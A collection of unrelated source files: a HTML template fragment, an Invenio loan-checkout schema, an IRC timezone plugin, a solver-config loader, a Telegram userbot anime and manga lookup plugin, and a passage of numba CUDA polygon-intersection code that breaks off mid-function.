#summary h2 { font-weight: normal; color: #666; }
#explanation { background:#eee; }
#instructions { background:#f6f6f6; }
#summary table { border:none; background:transparent; }
</style>
</head>
<body>
<div id="summary">
<h1>{{ heading }}</h1>
<h2>{{ subheading }}</h2>
</div>
<div id="instructions">
<p>
{{ instructions|safe }}
</p>
</div>
<div id="explanation">
<p>
{{ explanation|safe }}
</p>
</div>
</body></html>
"""
|
the-stack_0_25198
|
# -*- coding: utf-8 -*-
#
# Copyright (C) 2019 CERN.
#
# invenio-app-ils is free software; you can redistribute it and/or modify
# it under the terms of the MIT License; see LICENSE file for more details.
"""Invenio App ILS circulation Loan Checkout loader JSON schema."""
import arrow
from flask import current_app
from flask_babelex import lazy_gettext as _
from invenio_circulation.records.loaders.schemas.json import DateString, \
LoanItemPIDSchemaV1
from marshmallow import ValidationError, fields, post_load, validates
from invenio_app_ils.permissions import check_permission
from .base import LoanBaseSchemaV1
class LoanCheckoutSchemaV1(LoanBaseSchemaV1):
"""Loan checkout schema."""
item_pid = fields.Nested(LoanItemPIDSchemaV1, required=True)
start_date = DateString()
end_date = DateString()
force = fields.Bool(missing=False)
@validates("force")
def validate_force(self, value, **kwargs):
"""Validate that only librarian can perform a force checkout."""
if value:
# extra permission for force-checkout
permission = current_app.config["ILS_VIEWS_PERMISSIONS_FACTORY"](
"circulation-loan-force-checkout"
)
check_permission(permission)
@post_load()
def postload_checks(self, data, **kwargs):
"""Validate dates values."""
if "end_date" in data and "start_date" not in data:
raise ValidationError(
_("Start date is required when end date provided."),
field_names=["start_date", "end_date"],
)
if "start_date" in data and "end_date" in data:
start = arrow.get(data["start_date"]).date()
end = arrow.get(data["end_date"]).date()
if end < start:
raise ValidationError(
_("The loan end date cannot be before the start date."),
field_names=["start_date", "end_date"],
)
return data
|
the-stack_0_25200
|
from datetime import datetime
import pytz
from pytz.exceptions import UnknownTimeZoneError
from cardinal.decorators import command, help
TIME_FORMAT = '%b %d, %I:%M:%S %p UTC%z'
class TimezonePlugin:
@command(['time'])
@help("Returns the current time in a given time zone or GMT offset.")
@help("Syntax: time <GMT offset or timezone>")
def get_time(self, cardinal, user, channel, msg):
utc = pytz.utc
now = datetime.now(utc)
try:
tz_input = msg.split(' ', 1)[1].strip()
except IndexError:
# no timezone specified, default to UTC
return cardinal.sendMsg(channel, now.strftime(TIME_FORMAT))
# handle common offset formats
if (tz_input.startswith('UTC') or tz_input.startswith('GMT')) and \
len(tz_input) > 3 and tz_input[3] in ('+', '-'):
tz_input = tz_input[3:]
offset = None
try:
offset = int(tz_input)
except ValueError:
pass
if offset is not None:
try:
if offset < 0:
# for some reason the GMT+4 == America/Eastern, and GMT-4
# is over in Asia
user_tz = pytz.timezone('Etc/GMT+{0}'.format(offset * -1))
elif offset > 0:
user_tz = pytz.timezone('Etc/GMT{0}'.format(offset * -1))
else:
user_tz = utc
except UnknownTimeZoneError:
return cardinal.sendMsg(channel, 'Invalid UTC offset')
else:
try:
user_tz = pytz.timezone(tz_input)
except UnknownTimeZoneError:
return cardinal.sendMsg(channel, 'Invalid timezone')
now = user_tz.normalize(now)
cardinal.sendMsg(channel, now.strftime(TIME_FORMAT))
entrypoint = TimezonePlugin
|
the-stack_0_25201
|
import pathlib
import os
from importlib.machinery import SourceFileLoader
from .localSolver import LocalSolver
from .systemOnTPTP import SystemOnTPTPSolver
HERE = pathlib.Path(__file__).parent
DEFAULT_SOLVER_PATH = os.path.abspath(HERE / ".." / ".." / "config" / "solvers.py")
class Solvers():
"""
TODO speed this all up by lazy loading of config files.
"""
def __init__(self):
self._localSolver = None
self._systemOnTptpSolver = None
self._isInit = False
def init(self):
if self._isInit:
return
self.loadDefaultSolvers()
def loadDefaultSolvers(self):
solvers = SourceFileLoader('solvers', DEFAULT_SOLVER_PATH).load_module()
self._localSolver, self._systemOnTptpSolver = loadSolversAsDict(solvers.SOLVERS)
def getLocalSolver(self, name):
return self._localSolver.get(name, None)
def getSystemOnTptpSolver(self, name):
return self._systemOnTptpSolver.get(name, None)
"""
Singelton pattern
"""
_solvers__singelton = Solvers()
def _solvers():
_solvers__singelton.init()
return _solvers__singelton
def loadSolversAsDict(solverDefinitions):
_localSolver = {}
_systemOnTptpSolver = {}
for s in solverDefinitions:
if s['type'] == 'local':
name = s['name']
_localSolver[name] = LocalSolver(
name = name,
prettyName = s.get('pretty-name', None),
version = s.get('version', None),
command = s['command'],
)
else:
name = s['name']
_systemOnTptpSolver[name] = SystemOnTPTPSolver(
name = name,
prettyName = s.get('pretty-name', None),
systemOnTPTPName = s['system-on-tptp-name'],
version = s.get('version', None),
command = s['command'],
)
return _localSolver, _systemOnTptpSolver
def loadSolvers(solverDefinitions, split=False):
_solvers = []
for s in solverDefinitions:
if s['type'] == 'local':
name = s['name']
_solvers.append(LocalSolver(
name = name,
prettyName = s.get('pretty-name', None),
version = s.get('version', None),
command = s['command'],
encoding = s.get('encoding', None),
))
else:
name = s['name']
_solvers.append(SystemOnTPTPSolver(
name = name,
prettyName = s.get('pretty-name', None),
systemOnTPTPName = s['system-on-tptp-name'],
version = s.get('version', None),
command = s['command'],
))
return _solvers
def getLocalSolvers():
return _solvers()._localSolver
def getSystemOnTptpSolvers():
return _solvers()._systemOnTptpSolver
def getLocalSolver(name):
return _solvers().getLocalSolver(name)
def getSystemOnTptpSolver(name):
return _solvers().getSystemOnTptpSolver(name)
|
the-stack_0_25202
|
# Copyright (C) 2020 The Raphielscape Company LLC.
#
# Licensed under the Raphielscape Public License, Version 1.d (the "License");
# you may not use this file except in compliance with the License.
#
import asyncio
import html
import json
import re
import textwrap
from io import BytesIO, StringIO
from urllib.parse import quote as urlencode
import aiohttp
import bs4
import jikanpy
import pendulum
import requests
from html_telegraph_poster import TelegraphPoster
from jikanpy import Jikan
from jikanpy.exceptions import APIException
from telethon.errors.rpcerrorlist import FilePartsInvalidError
from telethon.tl.types import (
DocumentAttributeAnimated,
DocumentAttributeFilename,
MessageMediaDocument,
)
from telethon.utils import is_image, is_video
from userbot import CMD_HELP
from userbot.events import register
jikan = Jikan()
# Anime Helper
def getPosterLink(mal):
# grab poster from kitsu
kitsu = getKitsu(mal)
image = requests.get(f"https://kitsu.io/api/edge/anime/{kitsu}").json()
return image["data"]["attributes"]["posterImage"]["original"]
def getKitsu(mal):
# get kitsu id from mal id
link = f"https://kitsu.io/api/edge/mappings?filter[external_site]=myanimelist/anime&filter[external_id]={mal}"
result = requests.get(link).json()["data"][0]["id"]
link = f"https://kitsu.io/api/edge/mappings/{result}/item?fields[anime]=slug"
return requests.get(link).json()["data"]["id"]
def getBannerLink(mal, kitsu_search=True):
# try getting kitsu backdrop
if kitsu_search:
kitsu = getKitsu(mal)
image = f"http://media.kitsu.io/anime/cover_images/{kitsu}/original.jpg"
response = requests.get(image)
if response.status_code == 200:
return image
# try getting anilist banner
query = """
query ($idMal: Int){
Media(idMal: $idMal){
bannerImage
}
}
"""
data = {"query": query, "variables": {"idMal": int(mal)}}
image = requests.post("https://graphql.anilist.co", json=data).json()["data"][
"Media"
]["bannerImage"]
if image:
return image
return getPosterLink(mal)
def get_anime_manga(mal_id, search_type, _user_id):
jikan = jikanpy.jikan.Jikan()
if search_type == "anime_anime":
result = jikan.anime(mal_id)
trailer = result["trailer_url"]
if trailer:
LOL = f"<a href='{trailer}'>Cuplikan</a>"
else:
LOL = "<code>Tidak ada cuplikan yang tersedia</code>"
image = getBannerLink(mal_id)
studio_string = ", ".join(
studio_info["name"] for studio_info in result["studios"]
)
producer_string = ", ".join(
producer_info["name"] for producer_info in result["producers"]
)
elif search_type == "anime_manga":
result = jikan.manga(mal_id)
image = result["image_url"]
caption = f"📺 <a href='{result['url']}'>{result['title']}</a>"
if result["title_japanese"]:
caption += f" ({result['title_japanese']})\n"
else:
caption += "\n"
alternative_names = []
if result["title_english"] is not None:
alternative_names.append(result["title_english"])
alternative_names.extend(result["title_synonyms"])
if alternative_names:
alternative_names_string = ", ".join(alternative_names)
caption += f"\n<b>Juga dikenal sebagai</b> : <code>{alternative_names_string}</code>"
genre_string = ", ".join(genre_info["name"] for genre_info in result["genres"])
if result["synopsis"] is not None:
synopsis = result["synopsis"].split(" ", 60)
try:
synopsis.pop(60)
except IndexError:
pass
synopsis_string = " ".join(synopsis) + "..."
else:
synopsis_string = "Tidak diketahui"
for entity in result:
if result[entity] is None:
result[entity] = "Tidak diketahui"
if search_type == "anime_anime":
caption += textwrap.dedent(
f"""
🆎 <b>Tipe</b> : <code>{result['type']}</code>
📡 <b>Status</b> : <code>{result['status']}</code>
🎙️ <b>Ditayangkan</b> : <code>{result['aired']['string']}</code>
🔢 <b>Episode</b> : <code>{result['episodes']}</code>
💯 <b>Skor</b> : <code>{result['score']}</code>
🌐 <b>Perdana</b> : <code>{result['premiered']}</code>
⌛ <b>Durasi</b> : <code>{result['duration']}</code>
🎭 <b>Genre</b> : <code>{genre_string}</code>
🎙️ <b>Studio</b> : <code>{studio_string}</code>
💸 <b>Produser</b> : <code>{producer_string}</code>
🎬 <b>Cuplikan</b> : {LOL}
📖 <b>Ringkasan</b> : <code>{synopsis_string}</code> <a href='{result['url']}'>baca selengkapnya</a>
"""
)
elif search_type == "anime_manga":
caption += textwrap.dedent(
f"""
🆎 <b>Tipe</b> : <code>{result['type']}</code>
📡 <b>Status</b> : <code>{result['status']}</code>
🔢 <b>Volume</b> : <code>{result['volumes']}</code>
📃 <b>Bagian</b> : <code>{result['chapters']}</code>
💯 <b>Skor</b> : <code>{result['score']}</code>
🎭 <b>Genre</b> : <code>{genre_string}</code>
📖 <b>Ringkasan</b> : <code>{synopsis_string}</code>
"""
)
return caption, image
def get_poster(query):
url_enc_name = query.replace(" ", "+")
# Searching for query list in imdb
page = requests.get(
f"https://www.imdb.com/find?ref_=nv_sr_fn&q={url_enc_name}&s=all"
)
soup = bs4.BeautifulSoup(page.content, "lxml")
odds = soup.findAll("tr", "odd")
# Fetching the first post from search
page_link = "http://www.imdb.com/" + odds[0].findNext("td").findNext("td").a["href"]
page1 = requests.get(page_link)
soup = bs4.BeautifulSoup(page1.content, "lxml")
# Poster Link
image = soup.find("link", attrs={"rel": "image_src"}).get("href", None)
if image is not None:
# img_path = wget.download(image, os.path.join(Config.DOWNLOAD_LOCATION, 'imdb_poster.jpg'))
return image
def post_to_telegraph(anime_title, html_format_content):
post_client = TelegraphPoster(use_api=True)
auth_name = "@GengKapak"
bish = "https://t.me/GengKapak"
post_client.create_api_token(auth_name)
post_page = post_client.post(
title=anime_title, author=auth_name, author_url=bish, text=html_format_content
)
return post_page["url"]
def replace_text(text):
return text.replace('"', "").replace("\\r", "").replace("\\n", "").replace("\\", "")
async def callAPI(search_str):
query = """
query ($id: Int,$search: String) {
Media (id: $id, type: ANIME,search: $search) {
id
title {
romaji
english
}
description (asHtml: false)
startDate{
year
}
episodes
chapters
volumes
season
type
format
status
duration
averageScore
genres
bannerImage
}
}
"""
variables = {"search": search_str}
url = "https://graphql.anilist.co"
response = requests.post(url, json={"query": query, "variables": variables})
return response.text
async def formatJSON(outData):
msg = ""
jsonData = json.loads(outData)
res = list(jsonData.keys())
if "errors" in res:
msg += f"**Kesalahan** : `{jsonData['errors'][0]['message']}`"
else:
jsonData = jsonData["data"]["Media"]
if "bannerImage" in jsonData.keys():
msg += f"[〽️]({jsonData['bannerImage']})"
else:
msg += "〽️"
title = jsonData["title"]["romaji"]
link = f"https://anilist.co/anime/{jsonData['id']}"
msg += f"[{title}]({link})"
msg += f"\n\n**Tipe** : {jsonData['format']}"
msg += "\n**Genre** : "
for g in jsonData["genres"]:
msg += g + " "
msg += f"\n**Status** : {jsonData['status']}"
msg += f"\n**Episode** : {jsonData['episodes']}"
msg += f"\n**Tahun** : {jsonData['startDate']['year']}"
msg += f"\n**Skor** : {jsonData['averageScore']}"
msg += f"\n**Durasi** : {jsonData['duration']} min\n\n"
cat = f"{jsonData['description']}"
msg += " __" + re.sub("<br>", "\n", cat) + "__"
return msg
@register(outgoing=True, pattern=r"^\.anilist ?(.*)")
async def anilist(event):
if event.fwd_from:
return
input_str = event.pattern_match.group(1)
result = await callAPI(input_str)
msg = await formatJSON(result)
await event.edit(msg, link_preview=True)
@register(outgoing=True, pattern=r"^\.anime ?(.*)")
async def anime(event):
query = event.pattern_match.group(1)
reply = await event.get_reply_message()
await event.edit("`Mencari Anime...`")
if query:
pass
elif reply:
query = reply.text
else:
await event.edit("`Apa yang harus saya cari?`")
await asyncio.sleep(6)
await event.delete()
return
try:
res = jikan.search("anime", query)
except Exception as err:
await event.edit(f"**Kesalahan** : \n`{err}`")
return
try:
res = res.get("results")[0].get("mal_id") # Grab first result
except APIException:
await event.edit("`Kesalahan saat menghubungkan ke API.\nSilahkan coba lagi!`")
return
if res:
anime = jikan.anime(res)
title = anime.get("title")
japanese = anime.get("title_japanese")
anime.get("title_english")
type = anime.get("type")
duration = anime.get("duration")
synopsis = anime.get("synopsis")
source = anime.get("source")
status = anime.get("status")
episodes = anime.get("episodes")
score = anime.get("score")
rating = anime.get("rating")
genre_lst = anime.get("genres")
genres = ""
for genre in genre_lst:
genres += genre.get("name") + ", "
genres = genres[:-2]
studios = ""
studio_lst = anime.get("studios")
for studio in studio_lst:
studios += studio.get("name") + ", "
studios = studios[:-2]
duration = anime.get("duration")
premiered = anime.get("premiered")
image_url = anime.get("image_url")
trailer = anime.get("trailer_url")
if trailer:
bru = f"<a href='{trailer}'>Cuplikan</a>"
url = anime.get("url")
else:
await event.edit("`Tidak ada hasil yang ditemukan!`")
return
rep = f"<b>{title}</b> - <b>({japanese})</b>\n"
rep += f"<b>Tipe</b> : <code>{type}</code>\n"
rep += f"<b>Sumber</b> : <code>{source}</code>\n"
rep += f"<b>Status</b> : <code>{status}</code>\n"
rep += f"<b>Genre</b> : <code>{genres}</code>\n"
rep += f"<b>Episode</b> : <code>{episodes}</code>\n"
rep += f"<b>Durasi</b> : <code>{duration}</code>\n"
rep += f"<b>Skor</b> : <code>{score}</code>\n"
rep += f"<b>Studio</b> : <code>{studios}</code>\n"
rep += f"<b>Perdana</b> : <code>{premiered}</code>\n"
rep += f"<b>Peringkat</b> : <code>{rating}</code>\n\n"
rep += f"<a href='{image_url}'>\u200c</a>"
rep += f"📖 <b>Ringkasan</b> : <i>{synopsis}</i>\n"
rep += f'<b>Baca selengkapnya</b> : <a href="{url}">Daftar Anime</a>'
await event.edit(rep, parse_mode="HTML", link_preview=False)
@register(outgoing=True, pattern=r"^\.manga ?(.*)")
async def manga(event):
query = event.pattern_match.group(1)
await event.edit("`Mencari Manga...`")
if not query:
await event.edit("`Apa yang harus saya cari?`")
return
res = ""
manga = ""
try:
res = jikan.search("manga", query).get("results")[0].get("mal_id")
except APIException:
await event.edit("`Kesalahan saat menghubungkan ke API.\nSilahkan coba lagi!`")
return ""
if res:
try:
manga = jikan.manga(res)
except APIException:
await event.edit("`Kesalahan saat menghubungkan ke API.\nSilahkan coba lagi!`")
return ""
title = manga.get("title")
japanese = manga.get("title_japanese")
type = manga.get("type")
status = manga.get("status")
score = manga.get("score")
volumes = manga.get("volumes")
chapters = manga.get("chapters")
genre_lst = manga.get("genres")
genres = ""
for genre in genre_lst:
genres += genre.get("name") + ", "
genres = genres[:-2]
synopsis = manga.get("synopsis")
image = manga.get("image_url")
url = manga.get("url")
rep = f"<b>{title}</b> - <b>({japanese})</b>\n"
rep += f"<b>Tipe</b> : <code>{type}</code>\n"
rep += f"<b>Status</b> : <code>{status}</code>\n"
rep += f"<b>Genre</b> : <code>{genres}</code>\n"
rep += f"<b>Skor</b> : <code>{score}</code>\n"
rep += f"<b>Volume</b> : <code>{volumes}</code>\n"
rep += f"<b>Bagian</b> : <code>{chapters}</code>\n\n"
rep += f"<a href='{image}'>\u200c</a>"
rep += f"📖 <b>Ringkasan</b> : <i>{synopsis}</i>\n"
rep += f'<b>Baca selengkapnya</b> : <a href="{url}">Daftar Anime</a>'
await event.edit(rep, parse_mode="HTML", link_preview=False)
@register(outgoing=True, pattern=r"^\.a(kaizoku|kayo) ?(.*)")
async def site_search(event):
message = await event.get_reply_message()
search_query = event.pattern_match.group(2)
site = event.pattern_match.group(1)
if search_query:
pass
elif message:
search_query = message.text
else:
await event.edit("`Apa yang harus saya cari?`")
return
if site == "kaizoku":
search_url = f"https://animekaizoku.com/?s={search_query}"
html_text = requests.get(search_url).text
soup = bs4.BeautifulSoup(html_text, "html.parser")
search_result = soup.find_all("h2", {"class": "post-title"})
if search_result:
result = f"Klik <a href='{search_url}'>disini</a> untuk hasil lainnya dari <b>{html.escape(search_query)}</b> di <b>AnimeKaizoku</b> : \n\n"
for entry in search_result:
post_link = entry.a["href"]
post_name = html.escape(entry.text.strip())
result += f"• <a href='{post_link}'>{post_name}</a>\n"
await event.edit(result, parse_mode="HTML")
else:
result = f"Tidak ada hasil yang ditemukan untuk <b>{html.escape(search_query)}</b> di <b>AnimeKaizoku</b>"
await event.edit(result, parse_mode="HTML")
elif site == "kayo":
search_url = f"https://animekayo.com/?s={search_query}"
html_text = requests.get(search_url).text
soup = bs4.BeautifulSoup(html_text, "html.parser")
search_result = soup.find_all("h2", {"class": "title"})
result = f"Klik <a href='{search_url}'>disini</a> untuk hasil lainnya dari <b>{html.escape(search_query)}</b> di <b>AnimeKayo</b> : \n\n"
for entry in search_result:
if entry.text.strip() == "Nothing Found":
result = f"Tidak ada hasil yang ditemukan untuk <b>{html.escape(search_query)}</b> di <b>AnimeKayo</b>"
break
post_link = entry.a["href"]
post_name = html.escape(entry.text.strip())
result += f"• <a href='{post_link}'>{post_name}</a>\n"
await event.edit(result, parse_mode="HTML")
@register(outgoing=True, pattern=r"^\.char ?(.*)")
async def character(event):
message = await event.get_reply_message()
search_query = event.pattern_match.group(1)
if search_query:
pass
elif message:
search_query = message.text
else:
await event.edit("`Gunakan .char [nama karakter]`")
return
try:
search_result = jikan.search("character", search_query)
except APIException:
await event.edit("`Karakter tidak ditemukan!`")
return
first_mal_id = search_result["results"][0]["mal_id"]
character = jikan.character(first_mal_id)
caption = f"[{character['name']}]({character['url']})"
if character["name_kanji"] != "Japanese":
caption += f" ({character['name_kanji']})\n"
else:
caption += "\n"
if character["nicknames"]:
nicknames_string = ", ".join(character["nicknames"])
caption += f"\n**Nama panggilan** : `{nicknames_string}`"
about = character["about"].split(" ", 60)
try:
about.pop(60)
except IndexError:
pass
about_string = " ".join(about)
mal_url = search_result["results"][0]["url"]
for entity in character:
if character[entity] is None:
character[entity] = "Tidak diketahui"
caption += f"\n🔰**Data Karakter yang Diekstrak**🔰\n\n{about_string}"
caption += f" [Baca selengkapnya...]({mal_url})"
await event.delete()
await event.client.send_file(
event.chat_id,
file=character["image_url"],
caption=replace_text(caption),
reply_to=event,
)
@register(outgoing=True, pattern=r"^\.upcoming ?(.*)")
async def upcoming(message):
rep = "<b>Anime yang akan datang</b>\n\n"
later = jikan.season_later()
anime = later.get("anime")
for new in anime:
name = new.get("title")
url = new.get("url")
rep += f"• <a href='{url}'>{name}</a> \n"
if len(rep) > 1000:
break
await message.edit(rep, parse_mode="html")
@register(outgoing=True, pattern=r"^\.scanime ?(.*)")
async def get_anime(message):
try:
query = message.pattern_match.group(1)
except IndexError:
if message.reply_to_msg_id:
query = await message.get_reply_message().text
else:
await message.reply(
"`Anda tidak memberikan apapun untuk dicari.\nGunakan .scanime [nama anime]`"
)
return
except Exception as err:
await message.edit(f"`Menemukan pengecualian yang tidak diketahui :` \n{err}")
return
p_rm = await message.reply("`Mencari Anime...`")
f_mal_id = ""
try:
jikan = jikanpy.AioJikan()
search_res = await jikan.search("anime", query)
f_mal_id = search_res["results"][0]["mal_id"]
except IndexError:
await p_rm.edit(f"`Tidak ada hasil yang ditemukan untuk` **{query}**")
return
except Exception as err:
await p_rm.edit(f"`Menemukan pengecualian yang tidak diketahui :` \n{err}")
return
results_ = await jikan.anime(f_mal_id)
await jikan.close()
await message.delete()
# Get All Info of anime
anime_title = results_["title"]
jap_title = results_["title_japanese"]
eng_title = results_["title_english"]
type_ = results_["type"]
results_["source"]
episodes = results_["episodes"]
status = results_["status"]
results_["aired"].get("string")
results_["duration"]
rating = results_["rating"]
score = results_["score"]
synopsis = results_["synopsis"]
results_["background"]
producer_list = results_["producers"]
studios_list = results_["studios"]
genres_list = results_["genres"]
# Info for Buttons
mal_dir_link = results_["url"]
trailer_link = results_["trailer_url"]
main_poster = ""
telegraph_poster = ""
# Poster Links Search
try:
main_poster = get_poster(anime_title)
except BaseException:
pass
try:
telegraph_poster = getBannerLink(f_mal_id)
except BaseException:
pass
# if not main_poster:
main_poster = telegraph_poster
if not telegraph_poster:
telegraph_poster = main_poster
genress_md = ""
producer_md = ""
studio_md = ""
for i in genres_list:
genress_md += f"{i['name']} "
for i in producer_list:
producer_md += f"[{i['name']}]({i['url']}) "
for i in studios_list:
studio_md += f"[{i['name']}]({i['url']}) "
# Build synopsis telegraph post
html_enc = ""
html_enc += f"<img src = '{telegraph_poster}' title = {anime_title}/>"
html_enc += "<br><b>• Ringkasan : </b></br>"
html_enc += f"<br><em>{synopsis}</em></br>"
synopsis_link = post_to_telegraph(anime_title, html_enc)
# Build captions:
captions = f"""📺 **{anime_title}** - **{eng_title}** - **{jap_title}**
**🎭 Genre :** `{genress_md}`
**🆎 Tipe :** `{type_}`
**🔢 Episode :** `{episodes}`
**📡 Status :** `{status}`
**🔞 Peringkat :** `{rating}`
**💯 Skor :** `{score}`
[📖 Ringkasan]({synopsis_link})
[🎬 Cuplikan]({trailer_link})
[📚 Info selengkapnya]({mal_dir_link})
"""
await p_rm.delete()
await message.client.send_file(message.chat_id, file=main_poster, caption=captions)
@register(outgoing=True, pattern=r"^\.smanga ?(.*)")
async def manga(message):
search_query = message.pattern_match.group(1)
await message.get_reply_message()
await message.edit("`Mencari Manga...`")
jikan = jikanpy.jikan.Jikan()
search_result = jikan.search("manga", search_query)
first_mal_id = search_result["results"][0]["mal_id"]
caption, image = get_anime_manga(first_mal_id, "anime_manga", message.chat_id)
await message.delete()
await message.client.send_file(
message.chat_id, file=image, caption=caption, parse_mode="HTML"
)
@register(outgoing=True, pattern=r"^\.sanime ?(.*)")
async def anime(message):
search_query = message.pattern_match.group(1)
await message.get_reply_message()
await message.edit("`Mencari Anime...`")
jikan = jikanpy.jikan.Jikan()
search_result = jikan.search("anime", search_query)
first_mal_id = search_result["results"][0]["mal_id"]
caption, image = get_anime_manga(first_mal_id, "anime_anime", message.chat_id)
try:
await message.delete()
await message.client.send_file(
message.chat_id, file=image, caption=caption, parse_mode="HTML"
)
except BaseException:
image = getBannerLink(first_mal_id, False)
await message.client.send_file(
message.chat_id, file=image, caption=caption, parse_mode="HTML"
)
@register(outgoing=True, pattern=r"^\.whatanime")
async def whatanime(e):
media = e.media
if not media:
r = await e.get_reply_message()
media = getattr(r, "media", None)
if not media:
await e.edit("`Dibutuhkan media`")
return
ig = is_gif(media) or is_video(media)
if not is_image(media) and not ig:
await e.edit("`Media harus berupa gambar, gif atau video`")
return
filename = "file.jpg"
if not ig and isinstance(media, MessageMediaDocument):
attribs = media.document.attributes
for i in attribs:
if isinstance(i, DocumentAttributeFilename):
filename = i.file_name
break
await e.edit("`Mengunduh gambar...`")
content = await e.client.download_media(media, bytes, thumb=-1 if ig else None)
await e.edit("`Mencari hasil...`")
file = memory_file(filename, content)
async with aiohttp.ClientSession() as session:
url = "https://trace.moe/api/search"
async with session.post(url, data={"image": file}) as raw_resp0:
resp0 = await raw_resp0.text()
js0 = json.loads(resp0)["docs"]
if not js0:
await e.edit("`Tidak ada hasil yang ditemukan.`")
return
js0 = js0[0]
text = f'<b>{html.escape(js0["title_romaji"])}'
if js0["title_native"]:
text += f' ({html.escape(js0["title_native"])})'
text += "</b>\n"
if js0["episode"]:
text += f'<b>Episode :</b> {html.escape(str(js0["episode"]))}\n'
percent = round(js0["similarity"] * 100, 2)
text += f"<b>Kesamaan :</b> {percent}%\n"
dt = pendulum.from_timestamp(js0["at"])
text += f"<b>Di :</b> {html.escape(dt.to_time_string())}"
await e.edit(text, parse_mode="html")
dt0 = pendulum.from_timestamp(js0["from"])
dt1 = pendulum.from_timestamp(js0["to"])
ctext = (
f"{html.escape(dt0.to_time_string())} - {html.escape(dt1.to_time_string())}"
)
url = (
"https://media.trace.moe/video/"
f'{urlencode(str(js0["anilist_id"]))}' + "/"
f'{urlencode(js0["filename"])}'
f'?t={urlencode(str(js0["at"]))}'
f'&token={urlencode(js0["tokenthumb"])}'
)
async with session.get(url) as raw_resp1:
file = memory_file("preview.mp4", await raw_resp1.read())
try:
await e.reply(ctext, file=file, parse_mode="html")
except FilePartsInvalidError:
await e.reply("`Tidak dapat mengirim pratinjau.`")
def memory_file(name=None, contents=None, *, bytes=True):
if isinstance(contents, str) and bytes:
contents = contents.encode()
file = BytesIO() if bytes else StringIO()
if name:
file.name = name
if contents:
file.write(contents)
file.seek(0)
return file
def is_gif(file):
# ngl this should be fixed, telethon.utils.is_gif but working
# lazy to go to github and make an issue kek
if not is_video(file):
return False
return DocumentAttributeAnimated() in getattr(file, "document", file).attributes
CMD_HELP.update(
{
"anime": "`.anilist [anime]`"
"\n➥ Dapatkan informasi anime."
"\n\n`.anime [anime]`"
"\n➥ Dapatkan informasi Anime."
"\n\n`.manga [nama manga]`"
"\n➥ Dapatkan informasi Manga."
"\n\n`.akaizoku/.akayo [nama anime]`"
"\n➥ Dapatkan tautan unduhan Anime."
"\n\n`.char [nama karakter]`"
"\n➥ Dapatkan informasi karakter."
"\n\n`.upcoming`"
"\n➥ Dapatkan informasi Anime Mendatang."
"\n\n`.scanime` / `.sanime [anime]`"
"\n➥ Mencari anime."
"\n\n`.smanga [manga]`"
"\n➥ Mencari manga."
"\n\n`.whatanime [balas gambar adegan anime]`"
"\n➥ Temukan anime dari file media."
}
)
|
the-stack_0_25203
|
import math
import numba
import numpy as np
from numba import cuda
@numba.jit(nopython=True)
def div_up(m, n):
return m // n + (m % n > 0)
@cuda.jit('(float32[:], float32[:], float32[:])', device=True, inline=True)
def trangle_area(a, b, c):
return ((a[0] - c[0]) * (b[1] - c[1]) - (a[1] - c[1]) *
(b[0] - c[0])) / 2.0
@cuda.jit('(float32[:], int32)', device=True, inline=True)
def area(int_pts, num_of_inter):
area_val = 0.0
for i in range(num_of_inter - 2):
area_val += abs(
trangle_area(int_pts[:2], int_pts[2 * i + 2:2 * i + 4],
int_pts[2 * i + 4:2 * i + 6]))
return area_val
@cuda.jit('(float32[:], int32)', device=True, inline=True)
def sort_vertex_in_convex_polygon(int_pts, num_of_inter):
if num_of_inter > 0:
center = cuda.local.array((2, ), dtype=numba.float32)
center[:] = 0.0
for i in range(num_of_inter):
center[0] += int_pts[2 * i]
center[1] += int_pts[2 * i + 1]
center[0] /= num_of_inter
center[1] /= num_of_inter
v = cuda.local.array((2, ), dtype=numba.float32)
vs = cuda.local.array((16, ), dtype=numba.float32)
for i in range(num_of_inter):
v[0] = int_pts[2 * i] - center[0]
v[1] = int_pts[2 * i + 1] - center[1]
d = math.sqrt(v[0] * v[0] + v[1] * v[1])
v[0] = v[0] / d
v[1] = v[1] / d
if v[1] < 0:
v[0] = -2 - v[0]
vs[i] = v[0]
j = 0
temp = 0
for i in range(1, num_of_inter):
if vs[i - 1] > vs[i]:
temp = vs[i]
tx = int_pts[2 * i]
ty = int_pts[2 * i + 1]
j = i
while j > 0 and vs[j - 1] > temp:
vs[j] = vs[j - 1]
int_pts[j * 2] = int_pts[j * 2 - 2]
int_pts[j * 2 + 1] = int_pts[j * 2 - 1]
j -= 1
vs[j] = temp
int_pts[j * 2] = tx
int_pts[j * 2 + 1] = ty
@cuda.jit(
'(float32[:], float32[:], int32, int32, float32[:])',
device=True,
inline=True)
def line_segment_intersection(pts1, pts2, i, j, temp_pts):
A = cuda.local.array((2, ), dtype=numba.float32)
B = cuda.local.array((2, ), dtype=numba.float32)
C = cuda.local.array((2, ), dtype=numba.float32)
D = cuda.local.array((2, ), dtype=numba.float32)
A[0] = pts1[2 * i]
A[1] = pts1[2 * i + 1]
B[0] = pts1[2 * ((i + 1) % 4)]
B[1] = pts1[2 * ((i + 1) % 4) + 1]
C[0] = pts2[2 * j]
C[1] = pts2[2 * j + 1]
D[0] = pts2[2 * ((j + 1) % 4)]
D[1] = pts2[2 * ((j + 1) % 4) + 1]
BA0 = B[0] - A[0]
BA1 = B[1] - A[1]
DA0 = D[0] - A[0]
CA0 = C[0] - A[0]
DA1 = D[1] - A[1]
CA1 = C[1] - A[1]
acd = DA1 * CA0 > CA1 * DA0
bcd = (D[1] - B[1]) * (C[0] - B[0]) > (C[1] - B[1]) * (D[0] - B[0])
if acd != bcd:
abc = CA1 * BA0 > BA1 * CA0
abd = DA1 * BA0 > BA1 * DA0
if abc != abd:
DC0 = D[0] - C[0]
DC1 = D[1] - C[1]
ABBA = A[0] * B[1] - B[0] * A[1]
CDDC = C[0] * D[1] - D[0] * C[1]
DH = BA1 * DC0 - BA0 * DC1
Dx = ABBA * DC0 - BA0 * CDDC
Dy = ABBA * DC1 - BA1 * CDDC
temp_pts[0] = Dx / DH
temp_pts[1] = Dy / DH
return True
return False
@cuda.jit(
'(float32[:], float32[:], int32, int32, float32[:])',
device=True,
inline=True)
def line_segment_intersection_v1(pts1, pts2, i, j, temp_pts):
a = cuda.local.array((2, ), dtype=numba.float32)
b = cuda.local.array((2, ), dtype=numba.float32)
c = cuda.local.array((2, ), dtype=numba.float32)
d = cuda.local.array((2, ), dtype=numba.float32)
a[0] = pts1[2 * i]
a[1] = pts1[2 * i + 1]
b[0] = pts1[2 * ((i + 1) % 4)]
b[1] = pts1[2 * ((i + 1) % 4) + 1]
c[0] = pts2[2 * j]
c[1] = pts2[2 * j + 1]
